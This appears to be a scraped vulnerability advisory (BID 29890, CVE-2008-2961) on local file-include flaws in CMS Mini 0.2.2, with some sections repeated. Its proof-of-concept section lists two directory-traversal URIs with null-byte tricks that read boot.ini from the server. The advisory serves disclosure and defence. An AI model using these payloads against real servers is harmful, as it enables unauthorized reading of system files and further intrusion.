CMS Mini 'view/index.php' Multiple Local File Include Vulnerabilities
BID:29890
Info
CMS Mini 'view/index.php' Multiple Local File Include Vulnerabilities
| Bugtraq ID: | 29890 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-2961 |
| Remote: | Yes |
| Local: | No |
| Published: | Jun 23 2008 12:00AM |
| Updated: | May 07 2015 05:28PM |
| Credit: | CWH Underground |
| Vulnerable: |
CMS Mini CMS Mini 0.2.2 |
| Not Vulnerable: | |
Discussion
CMS Mini 'view/index.php' Multiple Local File Include Vulnerabilities
CMS Mini is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker can exploit these issues using directory-traversal strings to view local files in the context of the webserver process. This may aid in further attacks.
CMS Mini 0.2.2 is vulnerable; other versions may also be affected.
CMS Mini is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker can exploit these issues using directory-traversal strings to view local files in the context of the webserver process. This may aid in further attacks.
CMS Mini 0.2.2 is vulnerable; other versions may also be affected.
Exploit / POC
CMS Mini 'view/index.php' Multiple Local File Include Vulnerabilities
Attackers can exploit these issues via a browser.
The following proof-of-concept URIs are available:
http://www.example.com/[cmsmini_path]/view/?path=../../../../../../../../boot.ini%00&p=index.html
http://www.example.com/[cmsmini_path]/view/?path=cwh&p=../../../../../../../../boot.ini%00.html
Attackers can exploit these issues via a browser.
The following proof-of-concept URIs are available:
http://www.example.com/[cmsmini_path]/view/?path=../../../../../../../../boot.ini%00&p=index.html
http://www.example.com/[cmsmini_path]/view/?path=cwh&p=../../../../../../../../boot.ini%00.html
Solution / Fix
CMS Mini 'view/index.php' Multiple Local File Include Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
CMS Mini 'view/index.php' Multiple Local File Include Vulnerabilities
References:
References:
- CMS Mini Homepage (CMS Mini)